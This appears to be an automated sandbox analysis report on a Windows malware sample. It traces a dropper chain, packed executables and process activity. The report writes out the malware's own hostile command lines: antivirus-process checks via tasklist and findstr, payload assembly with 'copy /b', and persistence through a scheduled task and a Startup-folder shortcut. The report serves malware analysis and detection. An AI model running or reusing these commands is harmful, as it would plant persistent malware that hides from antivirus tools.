                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeCode function: 17_2_6D60649417_2_6D606494
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeCode function: 17_2_6D60649C17_2_6D60649C
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeCode function: 17_2_6D60663417_2_6D606634
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeCode function: 17_2_6D60661817_2_6D606618
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeCode function: 17_2_6D6066E417_2_6D6066E4
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeCode function: 17_2_6D6066D417_2_6D6066D4
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeCode function: 17_2_6D6061CC17_2_6D6061CC
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeCode function: 17_2_6D6061D017_2_6D6061D0
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeCode function: 17_2_6D6061DC17_2_6D6061DC
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeCode function: 17_2_6D60626417_2_6D606264
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeCode function: 17_2_6D60626817_2_6D606268
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeCode function: 17_2_6D60627417_2_6D606274
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeCode function: 17_2_6D60627817_2_6D606278
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeCode function: 17_2_6D60625C17_2_6D60625C
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeCode function: 17_2_6D6062D417_2_6D6062D4
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeCode function: 17_2_6D60628417_2_6D606284
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeCode function: 17_2_6D60629817_2_6D606298
                              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\amnew[1].exe 87618787E1032BBF6A6CA8B3388EA3803BE20A49E4AFABA1DF38A6116085062F
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeCode function: String function: 6D63E6CF appears 38 times
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeCode function: String function: 6D63E69B appears 123 times
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4056 -s 800
                              Source: mQRr8Rkorf.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 5562886 bytes, 2 files, at 0x2c +A "A7B94.exe" +A "3E11p.exe", ID 1361, number 1, 173 datablocks, 0x1503 compression
                              Source: A7B94.exe.0.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 3654106 bytes, 2 files, at 0x2c +A "1E08u3.exe" +A "2R0700.exe", ID 1457, number 1, 158 datablocks, 0x1503 compression
                              Source: HmngBpR[1].exe.9.drStatic PE information: Number of sections : 11 > 10
                              Source: HmngBpR.exe.9.drStatic PE information: Number of sections : 11 > 10
                              Source: uvwnwebboksg.51.drStatic PE information: No import functions for PE file found
                              Source: han.19.drStatic PE information: No import functions for PE file found
                              Source: mQRr8Rkorf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: pwHxMTy[1].exe.9.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: pwHxMTy.exe.9.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: T0QdO0l[1].exe.9.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: T0QdO0l.exe.9.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: 3E11p.exe.0.drStatic PE information: Section: xsbgiknq ZLIB complexity 0.9949813356419422
                              Source: 1E08u3.exe.1.drStatic PE information: Section: ZLIB complexity 0.9986925361570248
                              Source: 1E08u3.exe.1.drStatic PE information: Section: ezfgyvbn ZLIB complexity 0.9944717796641244
                              Source: rapes.exe.2.drStatic PE information: Section: ZLIB complexity 0.9986925361570248
                              Source: rapes.exe.2.drStatic PE information: Section: ezfgyvbn ZLIB complexity 0.9944717796641244
                              Source: bncn6rv.exe.9.drStatic PE information: Section: hbloxsmk ZLIB complexity 0.9943536530446454
                              Source: pwHxMTy[1].exe.9.drStatic PE information: Section: .CSS ZLIB complexity 1.0003264200621547
                              Source: pwHxMTy.exe.9.drStatic PE information: Section: .CSS ZLIB complexity 1.0003264200621547
                              Source: ADFoyxP[1].exe.9.drStatic PE information: Section: .reloc ZLIB complexity 1.002197265625
                              Source: ADFoyxP.exe.9.drStatic PE information: Section: .reloc ZLIB complexity 1.002197265625
                              Source: bncn6rv[1].exe.9.drStatic PE information: Section: hbloxsmk ZLIB complexity 0.9943536530446454
                              Source: T0QdO0l[1].exe.9.dr, ConcreteRole.csCryptographic APIs: 'TransformFinalBlock'
                              Source: T0QdO0l.exe.9.dr, ConcreteRole.csCryptographic APIs: 'TransformFinalBlock'
                              Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@80/108@11/8
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeCode function: 0_2_00FA3FEF CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,FormatMessageA,0_2_00FA3FEF
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeCode function: 0_2_00FA1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_00FA1F90
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeCode function: 1_2_00921F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_00921F90
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeCode function: 0_2_00FA597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_00FA597D
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeCode function: 0_2_00FA4FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,0_2_00FA4FE0
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\HmngBpR[1].exeJump to behavior
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5740:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1920:120:WilError_03
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeMutant created: NULL
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6048:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2336:120:WilError_03
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4056
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6304:120:WilError_03
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeFile created: C:\Users\user~1\AppData\Local\Temp\IXP000.TMPJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeCommand line argument: Kernel32.dll0_2_00FA2BFB
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeCommand line argument: Kernel32.dll1_2_00922BFB
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeCommand line argument: AnyViewer17_2_009F19D0
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeCommand line argument: p#nvpmv17_2_009F19D0
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeCommand line argument: pmv17_2_009F19D0
                              Source: mQRr8Rkorf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                              Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                              Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeFile read: C:\Users\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: unknownProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\"
                              Source: 2R0700.exe, 00000005.00000003.1029106070.0000000005457000.00000004.00000800.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1028439756.0000000005482000.00000004.00000800.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.999508918.0000000005478000.00000004.00000800.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.998805722.00000000054A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                              Source: mQRr8Rkorf.exeVirustotal: Detection: 65%
                              Source: mQRr8Rkorf.exeReversingLabs: Detection: 55%
                              Source: 1E08u3.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                              Source: 1E08u3.exeString found in binary or memory: " /add /y
                              Source: 1E08u3.exeString found in binary or memory: " /add
                              Source: rapes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                              Source: rapes.exeString found in binary or memory: " /add
                              Source: rapes.exeString found in binary or memory: " /add /y
                              Source: rapes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                              Source: rapes.exeString found in binary or memory: " /add
                              Source: rapes.exeString found in binary or memory: " /add /y
                              Source: unknownProcess created: C:\Users\user\Desktop\mQRr8Rkorf.exe "C:\Users\user\Desktop\mQRr8Rkorf.exe"
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\A7B94.exe
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\1E08u3.exe
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeProcess created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user~1\AppData\Local\Temp\bb556cff4a\rapes.exe"
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user~1\AppData\Local\Temp\bb556cff4a\rapes.exe
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exe C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\2R0700.exe
                              Source: unknownProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\"
                              Source: unknownProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\"
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exe "C:\Users\user~1\AppData\Local\Temp\10111840101\HmngBpR.exe"
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeProcess created: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe C:\Users\user~1\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeProcess created: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exe C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exe
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe "C:\Users\user~1\AppData\Local\Temp\10112790101\ADFoyxP.exe"
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\expand.exe expand Go.pub Go.pub.bat
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 353090
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Really.pub
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "posted" Good
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.com
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub m
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\353090\Seat.com Seat.com m
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & echo URL="C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & exit
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exe "C:\Users\user~1\AppData\Local\Temp\10114440101\9hUDDVk.exe"
                              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js"
                              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com" "C:\Users\user\AppData\Local\TradeSecure Innovations\F"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe "C:\Users\user~1\AppData\Local\Temp\10114630101\pwHxMTy.exe"
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeProcess created: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe "C:\Users\user~1\AppData\Local\Temp\10114630101\pwHxMTy.exe"
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exe "C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exe"
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4056 -s 800
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\A7B94.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\1E08u3.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exe C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\2R0700.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeProcess created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user~1\AppData\Local\Temp\bb556cff4a\rapes.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exe "C:\Users\user~1\AppData\Local\Temp\10111840101\HmngBpR.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe "C:\Users\user~1\AppData\Local\Temp\10112790101\ADFoyxP.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exe "C:\Users\user~1\AppData\Local\Temp\10114440101\9hUDDVk.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe "C:\Users\user~1\AppData\Local\Temp\10114630101\pwHxMTy.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.comJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeProcess created: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe C:\Users\user~1\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeProcess created: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exe C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exe
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\expand.exe expand Go.pub Go.pub.bat
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 353090
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Really.pub
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "posted" Good
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.com
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub m
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\353090\Seat.com Seat.com m
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & echo URL="C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & exit
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comProcess created: unknown unknown
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
                              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com" "C:\Users\user\AppData\Local\TradeSecure Innovations\F"
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeProcess created: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe "C:\Users\user~1\AppData\Local\Temp\10114630101\pwHxMTy.exe"
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeSection loaded: cabinet.dllJump to behavior
